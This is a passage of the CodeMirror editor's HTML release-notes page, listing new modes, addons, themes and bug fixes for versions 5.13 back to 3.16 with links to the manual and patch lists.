<li>New DOM event forwarded: <a href="http://codemirror.net/doc/manual.html#event_dom"><code>"dragleave"</code></a>.</li>
<li><a href="http://codemirror.net/mode/protobuf/index.html">protobuf mode</a>: Newly added.</li>
<li>Fix problem where <a href="http://codemirror.net/doc/manual.html#findMarks"><code>findMarks</code></a> sometimes failed to find multi-line marks.</li>
<li>Fix crash that showed up when atomic ranges and bidi text were combined.</li>
<li><a href="http://codemirror.net/demo/complete.html">show-hint addon</a>: Completion widgets no longer close when the line indented or dedented.</li>
<li><a href="http://codemirror.net/demo/merge.html">merge addon</a>: Fix bug when merging chunks at the end of the file.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_placeholder">placeholder addon</a>: No longer gets confused by <a href="http://codemirror.net/doc/manual.html#swapDoc"><code>swapDoc</code></a>.</li>
<li><a href="http://codemirror.net/doc/manual.html#addon_simplescrollbars">simplescrollbars addon</a>: Fix invalid state when deleting at end of document.</li>
<li><a href="http://codemirror.net/mode/clike/index.html">clike mode</a>: No longer gets confused when a comment starts after an operator.</li>
<li><a href="http://codemirror.net/mode/markdown/index.html">markdown mode</a>: Now supports CommonMark-style flexible list indentation.</li>
<li><a href="http://codemirror.net/mode/dylan/index.html">dylan mode</a>: Several improvements and fixes.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.12.0...5.13.0">list of patches</a></li>
</ul>
<p class="rel">19-02-2016: <a href="http://codemirror.net/codemirror-5.12.zip">Version 5.12</a>:</p>
<ul class="rel-note">
<li><a href="http://codemirror.net/demo/vim.html">Vim bindings</a>: Ctrl-Q is now an alias for Ctrl-V.</li>
<li><a href="http://codemirror.net/demo/vim.html">Vim bindings</a>: The Vim API now exposes an <code>unmap</code> method to unmap bindings.</li>
<li><a href="http://codemirror.net/demo/activeline.html">active-line addon</a>: This addon can now style the active line's gutter.</li>
<li><a href="http://codemirror.net/mode/fcl/">FCL mode</a>: Newly added.</li>
<li><a href="http://codemirror.net/mode/sql/">SQL mode</a>: Now has a Postgresql dialect.</li>
<li>Fix <a href="https://github.com/codemirror/CodeMirror/issues/3781">issue</a> where trying to scroll to a horizontal position outside of the document's width could cause the gutter to be positioned incorrectly.</li>
<li>Use absolute, rather than fixed positioning in the context-menu intercept hack, to work around a <a href="https://github.com/codemirror/CodeMirror/issues/3238">problem</a> when the editor is inside a transformed parent container.</li>
<li>Solve a <a href="https://github.com/codemirror/CodeMirror/issues/3821">problem</a> where the horizontal scrollbar could hide text in Firefox.</li>
<li>Fix a <a href="https://github.com/codemirror/CodeMirror/issues/3834">bug</a> that caused phantom scroll space under the text in some situations.</li>
<li><a href="http://codemirror.net/demo/sublime.html">Sublime Text bindings</a>: Bind delete-line to Shift-Ctrl-K on OS X.</li>
<li><a href="http://codemirror.net/mode/markdown/">Markdown mode</a>: Fix <a href="https://github.com/codemirror/CodeMirror/issues/3787">issue</a> where the mode would keep state related to fenced code blocks in an unsafe way, leading to occasional corrupted parses.</li>
<li><a href="http://codemirror.net/mode/markdown/">Markdown mode</a>: Ignore backslashes in code fragments.</li>
<li><a href="http://codemirror.net/mode/markdown/">Markdown mode</a>: Use whichever mode is registered as <code>text/html</code> to parse HTML.</li>
<li><a href="http://codemirror.net/mode/clike/">Clike mode</a>: Improve indentation of Scala <code>=></code> functions.</li>
<li><a href="http://codemirror.net/mode/python/">Python mode</a>: Improve indentation of bracketed code.</li>
<li><a href="http://codemirror.net/mode/htmlmixed/">HTMLMixed mode</a>: Support multi-line opening tags for sub-languages (<code><script></code>, <code><style></code>, etc).</li>
<li><a href="http://codemirror.net/mode/spreadsheet/">Spreadsheet mode</a>: Fix bug where the mode did not advance the stream when finding a backslash.</li>
<li><a href="http://codemirror.net/mode/xml/">XML mode</a>: The mode now takes a <code>matchClosing</code> option to configure whether mismatched closing tags should be highlighted as errors.</li>
</ul>
<p class="rel">20-01-2016: <a href="http://codemirror.net/codemirror-5.11.zip">Version 5.11</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/jsx/index.html">JSX</a>, <a href="../mode/haskell-literate/index.html">literate Haskell</a></li>
<li>The editor now forwards more <a href="manual.html#event_dom">DOM events</a>: <code>cut</code>, <code>copy</code>, <code>paste</code>, and <code>touchstart</code>. It will also forward <code>mousedown</code> for drag events</li>
<li>Fixes a bug where bookmarks next to collapsed spans were not rendered</li>
<li>The <a href="../mode/swift/index.html">Swift</a> mode now supports auto-indentation</li>
<li>Frontmatters in the <a href="../mode/yaml-frontmatter/index.html">YAML frontmatter</a> mode are now optional as intended</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.10.0...5.11.0">list of patches</a></li>
</ul>
<p class="rel">21-12-2015: <a href="http://codemirror.net/codemirror-5.10.zip">Version 5.10</a>:</p>
<ul class="rel-note">
<li>Modify the way <a href="manual.html#mark_atomic">atomic ranges</a> are skipped by selection to try and make it less surprising.</li>
<li>The <a href="../mode/swift/index.html">Swift mode</a> was rewritten.</li>
<li>New addon: <a href="manual.html#addon_jump-to-line">jump-to-line</a>.</li>
<li>New method: <a href="manual.html#isReadOnly"><code>isReadOnly</code></a>.</li>
<li>The <a href="manual.html#addon_show-hint">show-hint addon</a> now defaults to picking completions on single click.</li>
<li>The object passed to <a href="manual.html#event_beforeSelectionChange"><code>"beforeSelectionChange"</code></a> events now has an <code>origin</code> property.</li>
<li>New mode: <a href="../mode/crystal/index.html">Crystal</a>.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.9.0...5.10.0">list of patches</a></li>
</ul>
<p class="rel">23-11-2015: <a href="http://codemirror.net/codemirror-5.9.zip">Version 5.9</a>:</p>
<ul class="rel-note">
<li>Improve the way overlay (OS X-style) scrollbars are handled</li>
<li>Make <a href="manual.html#addon_annotatescrollbar">annotatescrollbar</a> and scrollpastend addons work properly together</li>
<li>Make <a href="manual.html#addon_show-hint">show-hint</a> addon select options on single click by default, move selection to hovered item</li>
<li>Properly fold comments that include block-comment-start markers</li>
<li>Many small language mode fixes</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.8.0...5.9.0">list of patches</a></li>
</ul>
<p class="rel">20-10-2015: <a href="http://codemirror.net/codemirror-5.8.zip">Version 5.8</a>:</p>
<ul class="rel-note">
<li>Fixes an infinite loop in
the <a href="manual.html#addon_hardwrap">hardwrap
addon</a></li>
<li>New modes: <a href="../mode/nsis/index.html">NSIS</a>, <a href="../mode/clike/index.html">Ceylon</a></li>
<li>The Kotlin mode is now a <a href="../mode/clike/index.html">clike</a> dialect, rather than a stand-alone mode</li>
<li>New option: <a href="manual.html#option_allowDropFileTypes"><code>allowDropFileTypes</code></a>. Binary files can no longer be dropped into CodeMirror</li>
<li>New themes: <a href="../demo/theme.html#bespin">bespin</a>, <a href="../demo/theme.html#hopscotch">hopscotch</a>, <a href="../demo/theme.html#isotope">isotope</a>, <a href="../demo/theme.html#railscasts">railscasts</a></li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.7.0...5.8.0">list of patches</a></li>
</ul>
<p class="rel">20-09-2015: <a href="http://codemirror.net/codemirror-5.7.zip">Version 5.7</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/vue/index.html">Vue</a>, <a href="../mode/oz/index.html">Oz</a>, <a href="../mode/mscgen/index.html">MscGen</a> (and dialects), <a href="../mode/css/gss.html">Closure Stylesheets</a></li>
<li>Implement <a href="http://commonmark.org">CommonMark</a>-style flexible list indent and cross-line code spans in <a href="../mode/markdown/index.html">Markdown</a> mode</li>
<li>Add a replace-all button to the <a href="manual.html#addon_search">search addon</a>, and make the persistent search dialog transparent when it obscures the match</li>
<li>Handle <code>acync</code>/<code>await</code> and ocal and binary numbers in <a href="../mode/javascript/index.html">JavaScript mode</a></li>
<li>Fix various issues with the <a href="../mode/haxe/index.html">Haxe mode</a></li>
<li>Make the <a href="manual.html#addon_closebrackets">closebrackets addon</a> select only the wrapped text when wrapping selection in brackets</li>
<li>Tokenize properties as properties in the <a href="../mode/coffeescript/index.html">CoffeeScript mode</a></li>
<li>The <a href="manual.html#addon_placeholder">placeholder addon</a> now accepts a DOM node as well as a string placeholder</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.6.0...5.7.0">list of patches</a></li>
</ul>
<p class="rel">20-08-2015: <a href="http://codemirror.net/codemirror-5.6.zip">Version 5.6</a>:</p>
<ul class="rel-note">
<li>Fix bug where you could paste into a <code>readOnly</code> editor</li>
<li>Show a cursor at the drop location when dragging over the editor</li>
<li>The <a href="../mode/rust/index.html">Rust mode</a> was rewritten to handle modern Rust</li>
<li>The editor and theme CSS was cleaned up. Some selectors are now less specific than before</li>
<li>New theme: <a href="../demo/theme.html#abcdef">abcdef</a></li>
<li>Lines longer than <a href="manual.html#option_maxHighlightLength"><code>maxHighlightLength</code></a> are now less likely to mess up indentation</li>
<li>New addons: <a href="manual.html#addon_autorefresh"><code>autorefresh</code></a> for refreshing an editor the first time it becomes visible, and <code>html-lint</code> for using <a href="http://htmlhint.com/">HTMLHint</a></li>
<li>The <a href="manual.html#addon_search"><code>search</code></a> addon now recognizes <code>\r</code> and <code>\n</code> in pattern and replacement input</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.5.0...5.6.0">list of patches</a></li>
</ul>
<p class="rel">20-07-2015: <a href="http://codemirror.net/codemirror-5.5.zip">Version 5.5</a>:</p>
<ul class="rel-note">
<li>New option: <a href="manual.html#option_lineSeparator"><code>lineSeparator</code></a> (with corresponding <a href="manual.html#lineSeparator">method</a>)
<li>New themes: <a href="../demo/theme.html#dracula">dracula</a>, <a href="../demo/theme.html#seti">seti</a>, <a href="../demo/theme.html#yeti">yeti</a>, <a href="../demo/theme.html#material">material</a>, and <a href="../demo/theme.html#icecoder">icecoder</a></li>
<li>New modes: <a href="../mode/brainfuck/index.html">Brainfuck</a>, <a href="../mode/vhdl/index.html">VHDL</a>, Squirrel (<a href="../mode/clike/index.html">clike</a> dialect)</li>
<li>Define a <code>findPersistent</code> command in
the <a href="../demo/search.html">search</a> addon, for a dialog
that stays open as you cycle through matches</li>
<li>From this release on, the NPM module doesn't include documentation and demos</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.4.0...5.5.0">list of patches</a></li>
</ul>
<p class="rel">25-06-2015: <a href="http://codemirror.net/codemirror-5.4.zip">Version 5.4</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/twig/index.html">Twig</a>, <a href="../mode/elm/index.html">Elm</a>, <a href="../mode/factor/index.html">Factor</a>, <a href="../mode/swift/index.html">Swift</a></li>
<li>Prefer clipboard API (if available) when pasting</li>
<li>Refined definition highlighting in <a href="../mode/clike/index.html">clike</a> mode</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.3.0...5.4.0">list of patches</a></li>
</ul>
<p class="rel">20-05-2015: <a href="http://codemirror.net/codemirror-5.3.zip">Version 5.3</a>:</p>
<ul class="rel-note">
<li>Fix several regressions in the <a href="manual.html#addon_show-hint"><code>show-hint</code></a> addon (<code>completeSingle</code> option, <code>"shown"</code> and <code>"close"</code> events)</li>
<li>The <a href="../demo/vim.html">vim mode</a> API was <a href="manual.html#vimapi">documented</a></li>
<li>New modes: <a href="../mode/asn.1/index.html">ASN.1</a>, <a href="../mode/ttcn/index.html">TTCN</a>, and <a href="../mode/ttcn-cfg/index.html">TTCN-CFG</a></li>
<li>The <a href="../mode/clike/index.html">clike</a> mode can now deep-indent <code>switch</code> statements, and roughly recognizes types and defined identifiers</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.2.0...5.3.0">list of patches</a></li>
</ul>
<p class="rel">20-04-2015: <a href="http://codemirror.net/codemirror-5.2.zip">Version 5.2</a>:</p>
<ul class="rel-note">
<li>Fix several race conditions
in <a href="manual.html#addon_show-hint"><code>show-hint</code></a>'s
asynchronous mode</li>
<li>Fix backspace binding in <a href="../demo/sublime.html">Sublime bindings</a></li>
<li>Change the way IME is handled in the <code>"textarea"</code> <a href="manual.html#option_inputStyle">input style</a></li>
<li>New modes: <a href="../mode/mumps/index.html">MUMPS</a>, <a href="../mode/handlebars/index.html">Handlebars</a></li>
<li>Rewritten modes: <a href="../mode/django/index.html">Django</a>, <a href="../mode/z80/index.html">Z80</a></li>
<li>New theme: <a href="../demo/theme.html#liquibyte">Liquibyte</a></li>
<li>New option: <a href="manual.html#option_lineWiseCopyCut"><code>lineWiseCopyCut</code></a></li>
<li>The <a href="../demo/vim.html">Vim mode</a> now supports buffer-local options and the <code>filetype</code> setting</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.1.0...5.2.0">list of patches</a></li>
</ul>
<p class="rel">23-03-2015: <a href="http://codemirror.net/codemirror-5.1.zip">Version 5.1</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/asciiarmor/index.html">ASCII armor</a> (PGP data), <a href="../mode/troff/index.html">Troff</a>, and <a href="../mode/cmake/index.html">CMake</a>.</li>
<li>Remove SmartyMixed mode, rewrite <a href="../mode/smarty/index.html">Smarty</a> mode to supersede it.</li>
<li>New commands in the <a href="manual.html#addon_merge">merge
addon</a>: <code>goNextDiff</code> and <code>goPrevDiff</code>.</li>
<li>The <a href="manual.html#addon_closebrackets">closebrackets addon</a> can now be configured per mode.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/5.0.0...5.1.0">list of patches</a>.</li>
</ul>
<p class="rel">20-02-2015: <a href="http://codemirror.net/codemirror-5.0.zip">Version 5.0</a>:</p>
<ul class="rel-note">
<li>Experimental mobile support (tested on iOS, Android Chrome, stock Android browser)</li>
<li>New option <a href="manual.html#option_inputStyle"><code>inputStyle</code></a> to switch between hidden textarea and contenteditable input.</li>
<li>The <a href="manual.html#getInputField"><code>getInputField</code></a>
method is no longer guaranteed to return a textarea.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.13.0...5.0.0">list of patches</a>.</li>
</ul>
</section>
<section id=v4 class=first>
<h2>Version 4.x</h2>
<p class="rel">20-02-2015: <a href="http://codemirror.net/codemirror-4.13.zip">Version 4.13</a>:</p>
<ul class="rel-note">
<li>Fix the way the <a href="../demo/closetag.html"><code>closetag</code></a> demo handles the slash character.</li>
<li>New modes: <a href="../mode/forth/index.html">Forth</a>, <a href="../mode/stylus/index.html">Stylus</a>.</li>
<li>Make the <a href="../mode/css/index.html">CSS mode</a> understand some modern CSS extensions.</li>
<li>Have the <a href="../mode/clike/index.html">Scala mode</a> handle symbols and triple-quoted strings.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.12.0...4.13.0">list of patches</a>.</li>
</ul>
<p class="rel">22-01-2015: <a href="http://codemirror.net/codemirror-4.12.zip">Version 4.12</a>:</p>
<ul class="rel-note">
<li>The <a href="manual.html#addon_closetag"><code>closetag</code></a>
addon now defines a <code>"closeTag"</code> command.</li>
<li>Adds a <code>findModeByFileName</code> to the <a href="manual.html#addon_meta">mode metadata</a>
addon.</li>
<li><a href="../demo/simplemode.html">Simple mode</a> rules can
now contain a <code>sol</code> property to only match at the start
of a line.</li>
<li>New
addon: <a href="manual.html#addon_selection-pointer"><code>selection-pointer</code></a>
to style the mouse cursor over the selection.</li>
<li>Improvements to the <a href="../mode/sass/index.html">Sass mode</a>'s indentation.</li>
<li>The <a href="../demo/vim.html">Vim keymap</a>'s search functionality now
supports <a href="manual.html#addon_matchesonscrollbar">scrollbar
annotation</a>.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.11.0...4.12.0">list of patches</a>.</li>
</ul>
<p class="rel">9-01-2015: <a href="http://codemirror.net/codemirror-4.11.zip">Version 4.11</a>:</p>
<p class="rel-note">Unfortunately, 4.10 did not take care of the
Firefox scrolling issue entirely. This release adds two more patches
to address that.</p>
<p class="rel">29-12-2014: <a href="http://codemirror.net/codemirror-4.10.zip">Version 4.10</a>:</p>
<p class="rel-note">Emergency single-patch update to 4.9. Fixes
Firefox-specific problem where the cursor could end up behind the
horizontal scrollbar.</p>
<p class="rel">23-12-2014: <a href="http://codemirror.net/codemirror-4.9.zip">Version 4.9</a>:</p>
<ul class="rel-note">
<li>Overhauled scroll bar handling.
Add pluggable <a href="../demo/simplescrollbars.html">scrollbar
implementations</a>.</li>
<li>Tweaked behavior for
the <a href="manual.html#addon_show-hint">completion addons</a> to
not take text after cursor into account.</li>
<li>Two new optional features in
the <a href="manual.html#addon_merge">merge addon</a>: aligning
editors, and folding unchanged text.</li>
<li>New
modes: <a href="../mode/dart/index.html">Dart</a>, <a href="../mode/ebnf/index.html">EBNF</a>, <a href="../mode/spreadsheet/index.html">spreadsheet</a>,
and <a href="../mode/soy/index.html">Soy</a>.</li>
<li>New <a href="../demo/panel.html">addon</a> to show persistent panels below/above an editor.</li>
<li>New themes: <a href="../demo/theme.html#zenburn">zenburn</a>
and <a href="../demo/theme.html#tomorrow-night-bright">tomorrow night
bright</a>.</li>
<li>Allow ctrl-click to clear existing cursors.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.8.0...4.9.0">list of patches</a>.</li>
</ul>
<p class="rel">22-11-2014: <a href="http://codemirror.net/codemirror-4.8.zip">Version 4.8</a>:</p>
<ul class="rel-note">
<li>Built-in support for <a href="manual.html#normalizeKeyMap">multi-stroke key bindings</a>.</li>
<li>New method: <a href="manual.html#getLineTokens"><code>getLineTokens</code></a>.</li>
<li>New modes: <a href="../mode/dockerfile/index.html">dockerfile</a>, <a href="../mode/idl/index.html">IDL</a>, <a href="../mode/clike/index.html">Objective C</a> (crude).</li>
<li>Support styling of gutter backgrounds, allow <code>"gutter"</code> styles in <a href="manual.html#addLineClass"><code>addLineClass</code></a>.</li>
<li>Many improvements to the <a href="../demo/vim.html">Vim mode</a>, rewritten visual mode.</li>
<li>Improvements to modes: <a href="../mode/gfm/index.html">gfm</a> (strikethrough), <a href="../mode/sparql/index.html">SPARQL</a> (version 1.1 support), and <a href="../mode/stex/index.html">sTeX</a> (no more runaway math mode).
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.7.0...4.8.0">list of patches</a>.</li>
</ul>
<p class="rel">20-10-2014: <a href="http://codemirror.net/codemirror-4.7.zip">Version 4.7</a>:</p>
<ul class="rel-note">
<li><strong>Incompatible</strong>:
The <a href="../demo/lint.html">lint addon</a> now passes the
editor's value as first argument to asynchronous lint functions,
for consistency. The editor is still passed, as fourth
argument.</li>
<li>Improved handling of unicode identifiers in modes for
languages that support them.</li>
<li>More mode
improvements: <a href="../mode/coffeescript/index.html">CoffeeScript</a>
(indentation), <a href="../mode/verilog/index.html">Verilog</a>
(indentation), <a href="../mode/clike/index.html">Scala</a>
(indentation, triple-quoted strings),
and <a href="../mode/php/index.html">PHP</a> (interpolated
variables in heredoc strings).</li>
<li>New modes: <a href="../mode/textile/index.html">Textile</a> and <a href="../mode/tornado/index.html">Tornado templates</a>.</li>
<li>Experimental new <a href="../demo/simplemode.html">way to define modes</a>.</li>
<li>Improvements to the <a href="../demo/vim.html">Vim
bindings</a>: Arbitrary insert mode key mappings are now possible,
and text objects are supported in visual mode.</li>
<li>The mode <a href="../mode/meta.js">meta-information file</a>
now includes information about file extensions,
and <a href="manual.html#addon_meta">helper
functions</a> <code>findModeByMIME</code>
and <code>findModeByExtension</code>.</li>
<li>New logo!</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.6.0...4.7.0">list of patches</a>.</li>
</ul>
<p class="rel">19-09-2014: <a href="http://codemirror.net/codemirror-4.6.zip">Version 4.6</a>:</p>
<ul class="rel-note">
<li>New mode: <a href="../mode/modelica/index.html">Modelica</a></li>
<li>New method: <a href="manual.html#findWordAt"><code>findWordAt</code></a></li>
<li>Make it easier to <a href="../demo/markselection.html">use text background styling</a></li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.5.0...4.6.0">list of patches</a>.</li>
</ul>
<p class="rel">21-08-2014: <a href="http://codemirror.net/codemirror-4.5.zip">Version 4.5</a>:</p>
<ul class="rel-note">
<li>Fix several serious bugs with horizontal scrolling</li>
<li>New mode: <a href="../mode/slim/index.html">Slim</a></li>
<li>New command: <a href="manual.html#command_goLineLeftSmart"><code>goLineLeftSmart</code></a></li>
<li>More fixes and extensions for the <a href="../demo/vim.html">Vim</a> visual block mode</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.4.0...4.5.0">list of patches</a>.</li>
</ul>
<p class="rel">21-07-2014: <a href="http://codemirror.net/codemirror-4.4.zip">Version 4.4</a>:</p>
<ul class="rel-note">
<li><strong>Note:</strong> Some events might now fire in slightly
different order (<code>"change"</code> is still guaranteed to fire
before <code>"cursorActivity"</code>)</li>
<li>Nested operations in multiple editors are now synced (complete
at same time, reducing DOM reflows)</li>
<li>Visual block mode for <a href="../demo/vim.html">vim</a> (<C-v>) is nearly complete</li>
<li>New mode: <a href="../mode/kotlin/index.html">Kotlin</a></li>
<li>Better multi-selection paste for text copied from multiple CodeMirror selections</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.3.0...4.4.0">list of patches</a>.</li>
</ul>
<p class="rel">23-06-2014: <a href="http://codemirror.net/codemirror-4.3.zip">Version 4.3</a>:</p>
<ul class="rel-note">
<li>Several <a href="../demo/vim.html">vim bindings</a>
improvements: search and exCommand history, global flag
for <code>:substitute</code>, <code>:global</code> command.
<li>Allow hiding the cursor by
setting <a href="manual.html#option_cursorBlinkRate"><code>cursorBlinkRate</code></a>
to a negative value.</li>
<li>Make gutter markers themeable, use this in foldgutter.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.2.0...4.3.0">list of patches</a>.</li>
</ul>
<p class="rel">19-05-2014: <a href="http://codemirror.net/codemirror-4.2.zip">Version 4.2</a>:</p>
<ul class="rel-note">
<li>Fix problem where some modes were broken by the fact that empty tokens were forbidden.</li>
<li>Several fixes to context menu handling.</li>
<li>On undo, scroll <em>change</em>, not cursor, into view.</li>
<li>Rewritten <a href="../mode/jade/index.html">Jade</a> mode.</li>
<li>Various improvements to <a href="../mode/shell/index.html">Shell</a> (support for more syntax) and <a href="../mode/python/index.html">Python</a> (better indentation) modes.</li>
<li>New mode: <a href="../mode/cypher/index.html">Cypher</a>.</li>
<li>New theme: <a href="../demo/theme.html#neo">Neo</a>.</li>
<li>Support direct styling options (color, line style, width) in the <a href="manual.html#addon_rulers">rulers</a> addon.</li>
<li>Recognize per-editor configuration for the <a href="manual.html#addon_show-hint">show-hint</a> and <a href="manual.html#addon_foldcode">foldcode</a> addons.</li>
<li>More intelligent scanning for existing close tags in <a href="manual.html#addon_closetag">closetag</a> addon.</li>
<li>In the <a href="../demo/vim.html">Vim bindings</a>: Fix bracket matching, support case conversion in visual mode, visual paste, append action.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.1.0...4.2.0">list of patches</a>.</li>
</ul>
<p class="rel">22-04-2014: <a href="http://codemirror.net/codemirror-4.1.zip">Version 4.1</a>:</p>
<ul class="rel-note">
<li><em>Slightly incompatible</em>:
The <a href="manual.html#event_cursorActivity"><code>"cursorActivity"</code></a>
event now fires after all other events for the operation (and only
for handlers that were actually registered at the time the
activity happened).</li>
<li>New command: <a href="manual.html#command_insertSoftTab"><code>insertSoftTab</code></a>.</li>
<li>New mode: <a href="../mode/django/index.html">Django</a>.</li>
<li>Improved modes: <a href="../mode/verilog/index.html">Verilog</a> (rewritten), <a href="../mode/jinja2/index.html">Jinja2</a>, <a href="../mode/haxe/index.html">Haxe</a>, <a href="../mode/php/index.html">PHP</a> (string interpolation highlighted), <a href="../mode/javascript/index.html">JavaScript</a> (indentation of trailing else, template strings), <a href="../mode/livescript/index.html">LiveScript</a> (multi-line strings).</li>
<li>Many small issues from the 3.x→4.x transition were found and fixed.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/4.0.3...4.1.0">list of patches</a>.</li>
</ul>
<p class="rel">20-03-2014: <a href="http://codemirror.net/codemirror-4.0.zip">Version 4.0</a>:</p>
<p class="rel-note">This is a new major version of CodeMirror. There
are a few <strong>incompatible</strong> changes in the API. Upgrade
with care, and read the <a href="upgrade_v4.html">upgrading
guide</a>.</p>
<ul class="rel-note">
<li>Multiple selections (ctrl-click, alt-drag, <a href="manual.html#setSelections">API</a>).</li>
<li>Sublime Text <a href="../demo/sublime.html">bindings</a>.</li>
<li><a href="manual.html#modloader">Module loader shims</a> wrapped around all modules.</li>
<li>Selection <a href="manual.html#command_undoSelection">undo</a>/<a href="manual.html#command_redoSelection">redo</a>.</li>
<li>Improved character measuring (faster, handles wrapped lines more robustly).</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/3.23.0...4.0.3">list of patches</a>.</li>
</ul>
</section>
<section id=v3>
<h2>Version 3.x</h2>
<p class="rel">22-04-2014: <a href="http://codemirror.net/codemirror-3.24.zip">Version 3.24</a>:</p>
<p class="rel-note">Merges the improvements from 4.1 that could
easily be applied to the 3.x code. Also improves the way the editor
size is updated when line widgets change.</p>
<p class="rel">20-03-2014: <a href="http://codemirror.net/codemirror-3.23.zip">Version 3.23</a>:</p>
<ul class="rel-note">
<li>In the <a href="../mode/xml/index.html">XML mode</a>,
add <code>brackets</code> style to angle brackets, fix
case-sensitivity of tags for HTML.</li>
<li>New mode: <a href="../mode/dylan/index.html">Dylan</a>.</li>
<li>Many improvements to the <a href="../demo/vim.html">Vim bindings</a>.</li>
</ul>
<p class="rel">21-02-2014: <a href="http://codemirror.net/codemirror-3.22.zip">Version 3.22</a>:</p>
<ul class="rel-note">
<li>Adds the <a href="manual.html#findMarks"><code>findMarks</code></a> method.</li>
<li>New addons: <a href="manual.html#addon_rulers">rulers</a>, markdown-fold, yaml-lint.</li>
<li>New theme: <a href="../demo/theme.html#mdn-like">mdn-like</a>.</li>
<li>New mode: <a href="../mode/solr/index.html">Solr</a>.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/3.21.0...3.22.0">list of patches</a>.</li>
</ul>
<p class="rel">16-01-2014: <a href="http://codemirror.net/codemirror-3.21.zip">Version 3.21</a>:</p>
<ul class="rel-note">
<li>Auto-indenting a block will no longer add trailing whitespace to blank lines.</li>
<li>Marking text has a new option <a href="manual.html#markText"><code>clearWhenEmpty</code></a> to control auto-removal.</li>
<li>Several bugfixes in the handling of bidirectional text.</li>
<li>The <a href="../mode/xml/index.html">XML</a> and <a href="../mode/css/index.html">CSS</a> modes were largely rewritten. <a href="../mode/css/less.html">LESS</a> support was added to the CSS mode.</li>
<li>The OCaml mode was moved to an <a href="../mode/mllike/index.html">mllike</a> mode, F# support added.</li>
<li>Make it possible to fetch multiple applicable helper values with <a href="manual.html#getHelpers"><code>getHelpers</code></a>, and to register helpers matched on predicates with <a href="manual.html#registerGlobalHelper"><code>registerGlobalHelper</code></a>.</li>
<li>New theme <a href="../demo/theme.html#pastel-on-dark">pastel-on-dark</a>.</li>
<li>Better ECMAScript 6 support in <a href="../mode/javascript/index.html">JavaScript</a> mode.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/3.20.0...3.21.0">list of patches</a>.</li>
</ul>
<p class="rel">21-11-2013: <a href="http://codemirror.net/codemirror-3.20.zip">Version 3.20</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/julia/index.html">Julia</a> and <a href="../mode/pegjs/index.html">PEG.js</a>.</li>
<li>Support ECMAScript 6 in the <a href="../mode/javascript/index.html">JavaScript mode</a>.</li>
<li>Improved indentation for the <a href="../mode/coffeescript/index.html">CoffeeScript mode</a>.</li>
<li>Make non-printable-character representation <a href="manual.html#option_specialChars">configurable</a>.</li>
<li>Add ‘notification’ functionality to <a href="manual.html#addon_dialog">dialog</a> addon.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/3.19.0...3.20.0">list of patches</a>.</li>
</ul>
<p class="rel">21-10-2013: <a href="http://codemirror.net/codemirror-3.19.zip">Version 3.19</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/eiffel/index.html">Eiffel</a>, <a href="../mode/gherkin/index.html">Gherkin</a>, <a href="../mode/sql/?mime=text/x-mssql">MSSQL dialect</a>.</li>
<li>New addons: <a href="manual.html#addon_hardwrap">hardwrap</a>, <a href="manual.html#addon_sql-hint">sql-hint</a>.</li>
<li>New theme: <a href="../demo/theme.html#mbo">MBO</a>.</li>
<li>Add <a href="manual.html#token_style_line">support</a> for line-level styling from mode tokenizers.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/3.18.0...3.19.0">list of patches</a>.</li>
</ul>
<p class="rel">23-09-2013: <a href="http://codemirror.net/codemirror-3.18.zip">Version 3.18</a>:</p>
<p class="rel-note">Emergency release to fix a problem in 3.17
where <code>.setOption("lineNumbers", false)</code> would raise an
error.</p>
<p class="rel">23-09-2013: <a href="http://codemirror.net/codemirror-3.17.zip">Version 3.17</a>:</p>
<ul class="rel-note">
<li>New modes: <a href="../mode/fortran/index.html">Fortran</a>, <a href="../mode/octave/index.html">Octave</a> (Matlab), <a href="../mode/toml/index.html">TOML</a>, and <a href="../mode/dtd/index.html">DTD</a>.</li>
<li>New addons: <a href="../addon/lint/css-lint.js"><code>css-lint</code></a>, <a href="manual.html#addon_css-hint"><code>css-hint</code></a>.</li>
<li>Improve resilience to CSS 'frameworks' that globally mess up <code>box-sizing</code>.</li>
<li>Full <a href="https://github.com/codemirror/CodeMirror/compare/3.16.0...3.17.0">list of patches</a>.</li>
</ul>
<p class="rel">21-08-2013: <a href="http://codemirror.net/codemirror-3.16.zip">Version 3.16</a>:</p>
<ul class="rel-note">
<li>The whole codebase is now under a single <a href="../LICENSE">license</a> file.</li>
<li>The project page was overhauled and redesigned.</li>
